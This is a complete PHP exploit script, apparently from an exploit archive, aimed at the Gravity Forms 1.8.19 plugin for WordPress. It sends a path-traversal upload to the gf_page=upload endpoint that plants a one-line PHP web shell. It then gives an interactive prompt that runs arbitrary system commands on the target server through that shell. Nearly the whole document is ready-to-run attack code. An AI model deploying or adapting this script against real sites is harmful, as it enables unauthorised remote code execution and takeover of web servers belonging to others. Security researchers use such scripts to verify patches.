WordPress Gravity Forms 1.8.19 Shell Upload

`<?php  
  
# Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload  
# Vendor Homepage: http://www.gravityforms.com/  
# Vulnerable Version(s): 1.8.19 (and below)  
# Exploit Author: Abk Khan  
# Contact: [ an0nguy @ protonmail.ch ]  
# Website: http://blog.lolwaleet.com/  
# Category: webapps  
# PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability!  
  
error_reporting(0);  
  
$domain = 'http://localhost/wordpress';  
$url = "$domain/?gf_page=upload";  
$shell = "$domain/wp-content/_input_3_khan.php5";  
$separator = '-----------------------------------------------------';  
  
$ch = curl_init($url);  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
$response = curl_exec($ch);  
curl_close($ch);  
  
if (eregi('ok', $response)) {  
echo "$separator\nShell at $shell\n$separator\n\n";  
while ($testCom != 'bubye!') {  
$user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));  
echo "$user@b0x:~$ ";  
$handle = fopen("php://stdin", 'r');  
$testCom = trim(fgets($handle));  
fclose($handle);  
$comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";  
echo $comOut;  
}  
}  
else {  
die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");  
}  
  
function get_string_between($string, $start, $end)  
{  
# stolen from stackoverflow!  
$string = " " . $string;  
$ini = strpos($string, $start);  
if ($ini == 0)  
return "";  
$ini += strlen($start);  
$len = strpos($string, $end, $ini) - $ini;  
return substr($string, $ini, $len);  
}  
?>  
  
`